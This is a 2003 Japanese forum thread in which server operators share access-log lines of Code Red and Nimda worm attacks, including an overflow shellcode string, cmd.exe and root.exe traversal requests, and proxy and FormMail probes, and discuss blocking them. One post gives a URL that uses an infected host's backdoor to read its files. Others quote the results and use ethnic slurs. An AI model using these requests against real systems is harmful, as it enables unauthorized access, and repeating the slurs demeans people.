211.158.61.191 - - [06/Apr/2003:05:13:13 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:18 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:24 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:29 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:34 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215

ウザい。

82 :DNS未登録さん:03/04/06 21:18 ID:???
中国、韓国からのアクセスは禁止!!

83 :DNS未登録さん:03/04/07 00:36 ID:???
どかーん!
(⌒⌒⌒)
 ||

/ ̄ ̄ ̄ ̄ ̄\
| ・ U      |
| |ι         |つ
U||  ̄ ̄ ||
   ̄      ̄
もうおこったぞう

61.232.0.1-61.237.255.254<!-- (CN)CHINA RAILWAY TELECOMMUNICATIONS CENTER -->
218.13.0.1-218.18.255.254<!-- (CN) CHINANET Guangdong province network Data Communication Division China Telecom -->
218.144.0.1-218.159.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.64.0.1-220.71.255.254<!-- (KR)KRNIC Korea Network Information Center -->
220.72.0.1-220.87.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.112.0.1-220.115.255.254<!-- (CN)Greatwall Broadband Network Co.Ltd. -->
220.163.0.1-220.165.255.254<!-- (CN)CHINANET yunnan province network China Telecom -->

アク禁

84 :78:03/04/08 12:12 ID:3BWn4KHU
>80
>最初はイタズラされてるだけあかと持ったんだけど、

いたずらしないで頂きたい。

ログ汚れ過ぎ
IIS狙われすぎ
ついでにsage過ぎ

あれ以来きてない。

>83
正解かも


85 :●かろりーたさん ◆JwU5Ac6TK2 :03/04/09 08:07 ID:???
どうもアタックの内容がアレなせいで落ちてるっぽいのよね
IPアドレスじゃなくてドメインで狙われてるっぽいし・・・

86 :78:03/04/09 08:49 ID:???
これは?

09.191.15.2 - - [09/Apr/2003:08:04:57 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:01 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:03 +0900] "GET /cgi-bin/FormMail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:05 +0900] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:09 +0900] "GET /cgi-sys/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:10 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:21 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-sys/FormMail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-bin/Formmail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:24 +0900] "GET /cgi-bin/mail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:25 +0900] "GET /cgi-bin/FORMMAIL.PL HTTP/1.0" 404 1184

87 :78:03/04/09 09:38 ID:???
板違いだけどついでにこれも

0-2pool57-34.nas10.lansing2.mi.us.da.qwest.net - - [08/Apr/2003:13:58:44 +0900] "CONNECT mailin-04.mx.aol.com:25 HTTP/1.0" 405 992 "-" "-"

多分オープンプロキシの検索ロボットだけど、踏み台に利用されないように。


88 :DNS未登録さん:03/04/10 00:56 ID:???
>>86 は任意の宛先に送信できるメール送信 CGI を狙った spammer。
>>87 は外部から任意のポートに接続できるプロクシを狙った spammer。


89 :DNS未登録さん:03/04/10 21:16 ID:???
最近、CONNECT〜が増えてきましたね

90 :DNS未登録さん:03/04/10 21:26 ID:???
あの手、この手ですよね。
まえにスパムを配信するウイルスの実験が行われていた可能性があると
記事で読んだ記憶があるけど。

スパムとワーム。何かオーバラップらして見えてくるのは自分だけかな。


91 :DNS未登録さん:03/04/11 23:01 ID:???
メールヘッダーが変なんですけど。何かわかりますかね。
ヘッダーは2.4KBあり、、Comments:の行がやたら長いです。

本文はスパムみたいなんですけど、sendmailのバグを狙っているような...
ワームの様な気もしてます。。。

Return-Path: <mailbox1@usgreencardoffice.com>
Received: from smtp1.cwidc.net (smtp1.cwidc.net [154.33.63.111])
by xxxx.jp (8.12.8/8.12.5)
with ESMTP id h3BDBGKZ017325 for <xxxxx@xxxxx.jp>;
Fri, 11 Apr 2003 22:11:19 +0900
Received: from [154.33.63.58] (helo=mail8.cwidc.net)
by smtp1.cwidc.net
with esmtp (Exim 3.20 #4) id 193yJ3-0004So-00 for xxxxx@xxxxx.jp;
Fri, 11 Apr 2003 22:11:01 +0900
Received: from pop
by mail8.cwidc.net
with local (Exim 3.20 #2) id 193yIz-0003BH-00 for xxxxx@xxxxx.jp;
Fri, 11 Apr 2003 22:10:57 +0900
Received: from [206.40.228.122] (helo=sm22.localdomain)
by mail8.cwidc.net
with esmtp (Exim 3.20 #2) id 193yIy-0003AM-00;
Fri, 11 Apr 2003 22:10:56 +0900
Received: from unknown
Date: Fri, 11 Apr 2003 07:10:19 -0600 (MDT)
Message-Id: <200304111310.h3BDAJIV019352@sm22.localdomain>
Comments: Received: from PbD:C6?oC65]:?E6CB]@C];A|E2<6492?oC65]:?E6CB]@C];ANz
B Received: from Jx2<2oC65]24|2:2:oC65]2?]688]@C];A|46J`geb_oC65]2?]688]@C];A|7FC
F<2H2oC65]2?]688]@C];A|8@?K@FoC65]2?]688]@C];A|9\@oC65]2?]688]@C];ATx M Recei
ved: from Ma92>2oC65]2?]688]@C];A|9:0?6EoC65]2?]688]@C];A|9:<2CFoC65]2?]688]@C];
A|:K>\AoC65]2?]688]@C];A|<2EF9:D2oC65]2?]688]@C];A|<:>:oC65]2?]688]@C];ATv T Re
ceived: from Tu<F>2oC65]2?]688]@C];A|<FD2?@oC65]2?]688]@C];A|>:J2?@oC65]2?]688]
@C];A|?30>2?2oC65]2?]688]@C];A|E\6oC65]2?]688]@C];A|E2<2\<oC65]2?]688]@C];ATq
R Received: from AcE6E@C2oC65]2?]688]@C];A|A2EC:4<oC65]2EC]4@];A|92D6oC65]6>
2:=]?6];A|KIad_oC65]6>2:=]?6];A|36673@H=oC65]9@E]4@];A|3JC5oC65]9@E]4@];ATz G Re
ceived: from Rm9@?6J366oC65]9@E]4@];A|<:?492?oC65]9@E]4@];A|?282@oC65]9@E]4@]
;A|JFA@>oC65]9@E]4@];A|2=8oC65]:?E6CB]@C];A|3@>3oC65]:?E6CB]@C];AMr Z Receive
d: from Nr43c__7oC65]:?E6CB]@C];A|4J36CoC65]:?E6CB]@C];A|7F8F@oC65]:?E6CB]@C];
A|92J2EoC65]:?E6CB]@C];A|9:C@E@oC65]:?E6CB]@C];A|9@C:<:E2oC65]:?E6CB]@C];ATT
T Received: from Nz<2KF9:C@oC65]:?E6CB]@C];A|<:5oC65]:?E6CB]@C];A|<@3@=5DoC65]:
?E6CB]@C];A|>2DoC65]:?E6CB]@C];A|>2D2@oC65]:?E6CB]@C];A|>:J23:oC65]:?E6CB]@C];
ARb Y Received: from PQ?:;:oC65]:?E6CB]@C];A|?@<@oC65]:?E6CB]@C];A|D2326oC65]:
?E6CB]@C];A|D249:oC65]:?E6CB]@C];A|D6?36:oC65]:?E6CB]@C];A|D:=6?46oC65]:?E6CB]
@C];ARz M
Errors: mailbox1@usgreencardoffice.com
From: "US Green Card Office Ltd." <mailbox1@usgreencardoffice.com>
To: Customer <customer@usgreencardoffice.com>
Subject: Get a Green Card for USA
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:


92 :DNS未登録さん:03/04/13 20:57 ID:???
うざい
219.140.150.166 - - [13/Apr/2003:16:51:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"
219.140.150.166 - - [13/Apr/2003:16:51:26 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"




前にCodeRedに対抗するCode Greenてのが来たけど
もう来ないな。
またこないかな。

93 :DNS未登録さん:03/04/15 13:45 ID:???
OrgName: Asia Pacific Network Information Centre
NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7


ここ、IPうじゃうじゃ持ってて最高にうざい。
二日で100個以上CodeRed来てるけど、ここが8割占めてたw
LAN内全感染の悪寒。

ってかIPいっぱいあるから一見いろんなとこから来てるみたいだけど、穴のあるところが
全部穴になって被害を広めてるのね。


#Apache初心者だから、ログを取らせない方法が良くわかんねえよ。

・ウイルス扱いにする。
・指定ファイルにアクセスしようとしたのは載せない。
・実際に、0Byteの指定ファイルを作っておく。

があった。みんなどうよ?つーかどれが普通よ?

94 :DNS未登録さん:03/04/15 13:53 ID:???
略称のほうは知ってた・・
APNICかよ。

マトモなとこだから他から経由されてるだけな気がするな・・・

95 :DNS未登録さん:03/04/15 13:54 ID:???
>>93
それ中国あたりのブロック割り当てじゃない?
うちにも中国方面からガンガンくるよ。


96 :DNS未登録さん:03/04/15 13:55 ID:???
>>93
ルーターで弾く。

97 :DNS未登録さん:03/04/15 13:57 ID:???
>>96

手作業での登録ですか?
手間が馬鹿にならんので、テクニックあればいいんだけど。


98 :DNS未登録さん:03/04/15 13:59 ID:???
>>95
JPNIC に関連団体で乗ってるところ。ほんとに感染してるなら微妙に恥かと。

http://216.239.57.100/search?q=cache:5uDTH1GaA9oC:www.nic.ad.jp/ja/profile/link.html+Asia+Pacific+Network+Information+Centre&hl=ja&lr=lang_ja&ie=UTF-8

99 :DNS未登録さん:03/04/15 14:53 ID:???
>>93
ネタだよね?ね?ね?

100 :DNS未登録さん:03/04/15 17:33 ID:???
>>99
うちもきてるよ。


101 :DNS未登録さん:03/04/15 19:33 ID:???
これが、この板の現実でしょ。悲しいけど。


102 :DNS未登録さん:03/04/16 11:38 ID:???
CodeRedが大量に来てますね...
 ⇒219.156.232.21
  219.237.77.95
  219.181.154.52
  219.140.211.162
  12.235.16.127

あと、ガーラって調査会社のロボット検索もウザイ
 ⇒211.4.250.133

103 :DNS未登録さん:03/04/16 15:34 ID:???
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

NetRange: 219.0.0.0 - 219.255.255.255
CIDR: 219.0.0.0/8
NetName: APNIC5
NetHandle: NET-219-0-0-0-1


104 :DNS未登録さん:03/04/16 15:35 ID:???
OrgName: AT&T WorldNet Services
OrgID: ATTW
Address: 400 Interpace Parkway
City: Parsippany
StateProv: NJ
PostalCode: 07054
Country: US

NetRange: 12.0.0.0 - 12.255.255.255
CIDR: 12.0.0.0/8
NetName: ATT
NetHandle: NET-12-0-0-0-1


105 :DNS未登録さん:03/04/16 15:37 ID:???

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.4.250.0
b. [ネットワーク名] I2TS-NET
f. [組織名] 株式会社イーツ
g. [Organization] I2ts Inc.,
m. [運用責任者] MK5986JP
n. [技術連絡担当者] HI1771JP
n. [技術連絡担当者] MK5986JP

>>102
ってなってるけど、がーらって会社なの?

106 :DNS未登録さん:03/04/16 17:55 ID:???
>>105
ネタですか?(w

107 :DNS未登録さん:03/04/16 20:24 ID:???
>>105
nslookupで逆引きすると、gala-net.co.jpという
ドメインが出てきます。何の会社かと思って
ホームページを見たら、ネット上の書き込みを
自動巡回してチェックするサービスを提供していました。

最近、フレッシュアイのロボット検索が定期的に
来るようになって、フレッシュアイにも情報が
登録されたんですが、それをガーラのロボットが
検出して、探りを入れに来ているようです。

108 :山崎渉:03/04/17 12:00 ID:???
(^^)

109 :DNS未登録さん:03/04/18 23:31 ID:9c62ManQ
YahooBB220013168112.bbtec.net - - [18/Apr/2003:23:11:33 +0900] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178

220.13.168.112うざすぎ。
YBBにメールして遮断できないものだろうか…

110 :DNS未登録さん:03/04/19 01:06 ID:???
>>109
ごめん

111 :DNS未登録さん:03/04/19 01:07 ID:???
>>100
来ている来ていないの問題じゃなくて(ry

112 :DNS未登録さん:03/04/19 09:15 ID:???
>>109
YBBならIP変わらないみたいだから、アクセス制限リストに
放り込んで置けば宜しいかと。まあ、それでも鬱陶しい
事に変わりは無いけど。

113 :DNS未登録さん:03/04/19 22:57 ID:???
>>109
入り込んで止めてあげたら?(w

114 :山崎渉:03/04/20 05:53 ID:???
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

115 :::03/04/21 18:07 ID:j62Px7e4
☆^〜^★ 50音順で探せて楽して得する
http://sagatoku.fc2web.com/
   あなたの探し物きっとみつかるよ☆^〜^★


116 :DNS未登録さん:03/04/22 04:26 ID:???
>>113
それってCodeGreen…w

117 :DNS未登録さん:03/04/30 19:11 ID:???
最近こんなのが来てる。

202.98.1.21 - - [27/Apr/2003:16:37:47 +0900] "GET / HTTP/1.1" 400 296 "-" "-"
202.98.1.21 - - [27/Apr/2003:16:37:48 +0900] "POST / HTTP/1.1" 413 1035 "-" "-"


118 :初心者:03/04/30 21:09 ID:???
当方やふーbbですが、
昨日Anhttpdで適当にweb鯖を立てて放置したところ
いろいろ釣れました。

なんですかコリャ?
相手もやふーbbのようで。。
感染したワームが、一体何をしようとしているのだかよく分からんが
xが延々と並んでいるのが、噂に聞くバッファオーバーフローってやつですか?
一日中こんなの送ってきて動作が重くなったりしないんだろか

219.144.82.204 - - [30/Apr/2003:20:23:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u
8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:45:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 211
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:01 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:02 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215




119 :初心者:03/04/30 21:14 ID:???
って最初の219.144.82.204は中国の鯖っぽいな。
アクセスしようとしたら漢字だらけの404が返ってきた。

やふーbbの方はアホなユーザーがワームに感染していることも知らず
繋ぎっ放しにしているのかなぁ・・・

120 :DNS未登録さん:03/04/30 21:14 ID:???
飽きるほど見たNimdaだな。

121 :DNS未登録さん:03/04/30 21:28 ID:???
感染していることすら判断できない、バカユーザがIISを立ち上げていることに疑問を感じるが。


122 :DNS未登録さん:03/05/01 00:23 ID:???
つーか、>119は僅か100程のレスを遡って見る事もできんのか・・・

123 :119:03/05/01 00:56 ID:???
>>122
すんマソ。良く見たら
殆んど同じような報告がいくつも書かれていた…。

初心者なので変なのが飛んできたことが嬉しくて
ついつい書いてしまったのでつた。


124 :119:03/05/01 01:05 ID:???
こう言うワームの類って、
鯖にセキュリティーホールが無ければ直接害は無いんだよね?

しかし大量に飛んでくると
ログ作成するのに負荷が掛かるってのがあるか…

ルーターでワームだけをカットするような設定は、
簡単には出来るんかなぁ

IP指定するのは当然出来るが
こうあちこちから飛んでくると切りが無い。

125 :DNS未登録さん:03/05/02 11:05 ID:???
だから、IP弾きは自動化できないって・・・

つーか動的IPや踏み台等を完全場合わけで簡単自動処理できるのがあるなら
教えてもらいたい・・・

なんも考えないでニムダやCodeRedを飛ばしてくるIPをブラックリストに入れると
困る可能性がある。

困ったときには、どこのブラックリストの一部が困ったのかわからないので
ブラックリスト自体を消す羽目になる。

以上無理。

126 :DNS未登録さん:03/05/02 22:29 ID:???
IPを弾くのではなく、ワームが送るヘッダーの特徴を検出して削除する
ハードウェアルータがあったら良いのにな
もちろん検出パターンはメーカーからの自動更新で。

127 :DNS未登録さん:03/05/02 23:18 ID:???
>>118
219.180.88.36 のは日本だし、めちゃくちゃちゃねらーだな (藁

http://219.180.88.36/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

128 :DNS未登録さん:03/05/03 00:31 ID:???
>>127
> Windows 2000 Version: 5.0
> 現在のビルド: 2195
> Service Pack: None
> 現在のタイプ: Uniprocessor Free
> 登録されている会社名: (・∀・)
> 登録されている所有者: (・∀・)

禿げ藁
常時接続のくせにServicePackも当てとらんとは、
もしや、ワレザーだったりしてな。

今頃Winnyでエロ画像落としてハァハァしてるんだろ

129 :DNS未登録さん:03/05/03 02:47 ID:???
MSNメッセンジャーとかIE、メモ帳位しか開いてないやん。
tptp.exeが大活躍していたりはするけどw
2ちゃんねらーにしては激しくツマンナイ椰子やね。



こういうのが糞スレ立てるんだろうな。

130 :129:03/05/03 02:49 ID:???
tftp.exeの間違い(欝氏

131 :DNS未登録さん:03/05/03 11:11 ID:OG87RHjs
WHOISでみるかぎりコリアみたいですねー
210.95.90.50 - - [02/May/2003:12:57:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

これはチャイナ
210.72.239.240 - - [02/May/2003:09:53:08 +0900] "GET /default.ida?XXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

132 :DNS未登録さん:03/05/03 12:20 ID:8w0u+xU1
とりあえず、今日だけの分でも素のIPを晒します。
211.153.19.148
211.180.229.213
211.114.27.16
211.249.78.151
211.116.251.18
上から順に新しい
全てCoderedに感染。しかも日本のIPかな?よく分からん。

133 :DNS未登録さん:03/05/03 12:23 ID:8w0u+xU1
って調べたら、前のとあわせて全部国はオーストラリアじゃん!!

134 :DNS未登録さん:03/05/03 12:26 ID:7iA2vytO
http://www13.big.or.jp/~fubuki/chat/chat2.html
荒らしてもただ見るだけでもOK。これからどんどんロム増えるから。
これと同じヤツをいろんなヤツにコピペしてね

135 :DNS未登録さん:03/05/03 13:27 ID:???
>>133
馬鹿は whois を使うな。

136 :DNS未登録さん:03/05/03 20:46 ID:???
>>126
IDSを使うといいかも。個人向けにはトレンドマイクロから出ている。
NTTからFlet'sユーザー向けのOEM版も販売されている。ただ、
スループットが低いので、光ユーザーだと勿体無い。
http://www.trendmicro.com/jp/products/desktop/gatelock/evaluate/overview.htm

>>127
>>128
>>129
不味くないか?


137 :DNS未登録さん:03/05/04 01:25 ID:???
>>127-129
通報しますた!

と、言いたい所だが不正アクセス等を
相手は全く理解していない予感…

138 : :03/05/08 14:27 ID:???
少なくともこれらのリクエスト送ってくるヤツらは
MSのIISを立ち上げてる、と考えていいのですか?

202.125.153.14
61.187.64.194
202.39.15.237
202.131.151.20
202.194.196.67

これらはホスト名逆引きできないんですが、どういうことでしょうか。

139 :138:03/05/08 14:29 ID:???
ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。

140 :DNS未登録さん:03/05/08 16:36 ID:???
>>138
> これらはホスト名逆引きできないんですが、どういうことでしょうか。
ISPが設定していないから。(.paknet.com.pk .twnic.net .estelcom.com .edu.cn .chinanet.cn.net)
>>139
> ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。
赤帽と窓のデュアルブート環境だから。

141 :DNS未登録さん:03/05/08 16:41 ID:???
キャリア

142 : :03/05/10 04:49 ID:???
赤帽と窓のデュアルブート環境だから。

意味が分からない、apacheが立ち上がってるのに
なぜIISに感染するcode redが動いてるの?
Linuxが動いてるはずなのに。

143 :DNS未登録さん:03/05/10 11:09 ID:???
再接続でアドレスが変わったんじゃなーの?
んで、たまたま新たに割り振られた先に赤帽&apacheがあったとか。

144 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/05/10 11:44 ID:???
>>142
Win32版&IISだったとか(Linuxの根拠は。

145 :DNS未登録さん:03/05/10 14:08 ID:???
>144
実際にアクセスしてみてヘッダを見てからの発言だろーな?

146 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/05/10 18:43 ID:???
>>146
ルータの下でポートフォワードで複数動かしてるとか。

147 :DNS未登録さん:03/05/10 19:51 ID:???
自問自答ですか?

148 :DNS未登録さん:03/05/11 02:29 ID:???
ログの中にこんなの発見した
218.20.118.230 - - [09/May/2003:05:41:08 +0900] "GET http://www.21cn.net/ HTTP/1.1" 200 1529

何?

149 : :03/05/11 03:27 ID:???
というか、不毛にIIS動かしてるバカ多すぎ。
トラフィックの無駄遣いも甚だしい。
どうせ何のサービスかわかってないような輩だろ。
NT系、デフォルトでIISなんて入ってないはずなのに
なんで動いてるんだ。取り敢えず腹が立つ。

150 :DNS未登録さん:03/05/11 03:59 ID:???
202.196.110.208 - - [11/May/2003:00:01:29 +0900] "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 2973 "-" "-"

http://202.196.110.208/

チョン国の中学校の鯖が感染しております。
なんてメールしたらいいかな「貴方感染。鯖PC code red」漢文わからん(T_T)

>>128のような情報を引っ張るにはどうしたらいいの?
http://IPアドレス/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
ってリクエストすればいいの?404なったけど。

151 :DNS未登録さん:03/05/11 10:37 ID:M3fadPgI
http://bizinfo.cool.ne.jp/biz-rank/ranklink.cgi?id=mercury

152 :DNS未登録さん:03/05/11 13:26 ID:x4ndWFzf
>貴方感染

もしかしたら、なんとなく程度だとしても意味が通じるかもしれない


>鯖PC

これは絶対無理(藁


153 :DNS未登録さん:03/05/11 13:29 ID:???
>>150
英語で送っとけ
中国のエリートならペラペラだから

154 :DNS未登録さん:03/05/11 14:10 ID:???
そして、その中国のエリートが管理する鯖は穴だらけ。

155 :●かろりーたさん ◆JwU5Ac6TK2 :03/05/11 14:56 ID:???
>>148
http://www.21cn.net/
がそのIPアドレスにあると勘違い(?)して参照しようとしてきたリクエスト

156 :DNS未登録さん:03/05/11 14:57 ID:???


157 :DNS未登録さん:03/05/11 15:21 ID:???
>>149
漏れW2Kでサービスをいじってたら、
知らぬ間にIISが動作していたよ・・・

ANHTTPD起動しようとしたが
80番ポートが開いてないエラーが出るので調べていたら発覚した

そんな香具師が意外と多い予感


158 :貴方感染:03/05/11 15:52 ID:???
>貴方感染
我SARS否
とか、帰ってきそう(汗

>>149
>>157
そうなんですよね。
ウイルス対策も分からないやつが、標準で入らないIISを入れてしまっていることに
やり場のない怒りと、やるせなさと…


159 :148:03/05/11 19:09 ID:???
>>155
なるほど。
けどうちはttp://www.21cn.net/じゃないのになぜ200を返したんでしょうか?
cmd.exe、root.exe、favicon.ico、default.ida等には404を返しているのに。

160 :DNS未登録さん:03/05/11 20:36 ID:???
>>159
踏み台にして失敗したものです。
気になるようだったら、
SetEnvIf HOST FQDN allowed01
deny from env=!allowed01
にしとけば、403返すかと。

161 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/05/12 02:43 ID:???
>>150
>貴方感染
チョン環境っていうより大陸向けのような気もします。
半島って標準で和文や簡体、繁体フォント入ってるのかなあ。

マジレスすると普通に
Your environment is infected with the virus
and it is troubled. Please carry out somehow.
とかのほうが(文字コードだなんだ考えずに済んで)いいと思います。

162 :148-159:03/05/12 13:50 ID:???
>>160
あ、そうだったんですか。
うちが荒らされたりする分にゃ自分が我慢すれば済むけど、よそ様まで巻き込むのは不本意です。
教えていただいた「SetEnvIf HOST FQDN allowed01」を勉強のために検索してみました。

「Host:ヘッダーを指定しないリクエストを拒否する方法。」として、「ワームは、DNSの逆引きでもしない限り
HostヘッダにFQDN名をセットできない、よってIPアドレス指定でアクセスしてきても、404 Object Not Foundエ
ラーが返る。」とありましたので、httpd.confに設定してみました。

しばらくこれで様子を見てみます。ありがとうございました。
今月に入ってCodeRedが1日平均27個、先月あたりからだんだん増えてきているみたいです。
ネット上で見付けた「Code Red Check」というperl scriptと「dnstran」と「analog」使ってマメにログをチェ
ックするぐらいしか出来ませんが、地道にやっていきます。

163 :DNS未登録さん:03/05/13 01:52 ID:???
64.110.110.240
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
(略)
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ090ヨ190ヨ0c3ヨ003ヨb00ヨ31bヨ3ffヨ078ヨ000ヨ0=a

ウガンダキタ━━━━━━(゚∀゚)━━━━━━━!!!!!

164 :DNS未登録さん:03/05/15 09:44 ID:NUYgsRrd
202.107.205.9 - - [15/May/2003:02:00:06 +0900] "\x05\x01" 501 - "-" "-"

最近多いのですが、このリクエストは何でしょうか?新手のワーム?

165 :DNS未登録さん:03/05/15 21:13 ID:y3uNO88M
219.218.95.81 - - [15/May/2003:17:46:54 +0900]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 274 "-" "-"


166 :_:03/05/15 21:49 ID:???
  ∋8ノノハ.∩  
   川o・-・)ノ <先生!こんなのがありました!
http://www.hiroyuki.zansu.com/moe/hankaku07.html
http://hiroyuki.zansu.com/moe/hankaku10.html
http://www.hiroyuki.zansu.com/moe/hankaku08.html
http://hiroyuki.zansu.com/moe/hankaku09.html
http://www.hiroyuki.zansu.com/moe/hankaku06.html
http://hiroyuki.zansu.com/moe/hankaku05.html
http://www.hiroyuki.zansu.com/moe/hankaku01.html
http://hiroyuki.zansu.com/moe/hankaku02.html
http://www.hiroyuki.zansu.com/moe/hankaku03.html
http://hiroyuki.zansu.com/moe/hankaku04.html

167 : ◆CfyWV6PsHI :03/05/16 00:12 ID:???
ワーム対策にバーチャルホストはどうよ
HTTP_HOSTがない場合はダミーページの飛ばす


168 : ◆CfyWV6PsHI :03/05/16 00:14 ID:???
ログをバーチャルホスト毎に記録すれば
ワームのログは通常のログに混じらないが

169 :山崎渉:03/05/22 01:54 ID:???
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

170 :DNS未登録さん:03/05/23 20:57 ID:???
203.222.151.18 - - [23/May/2003:06:21:48 +0900] "GET (^^) HTTP/1.0" 404 1373


171 :山崎渉:03/05/28 17:09 ID:???
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

172 :DNS未登録さん:03/05/29 00:01 ID:???
初心者からの素朴な疑問

例えば、
c:/www/scripts/..チ/winnt/system32/cmd.exe
にワームがアクセスしてくるとしますよね。

該当するディレクトリを作って、cmd.exeって名前のファイル(例えばフロッピーにアクセスし続けるファイルとか)置いといたらどうなるんでしょ?

173 :DNS未登録さん:03/05/31 23:54 ID:9YFZ/gSa
きのうの夕方に同一IPから5秒おきに20連発

"GET /NULL.IDA?CCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000
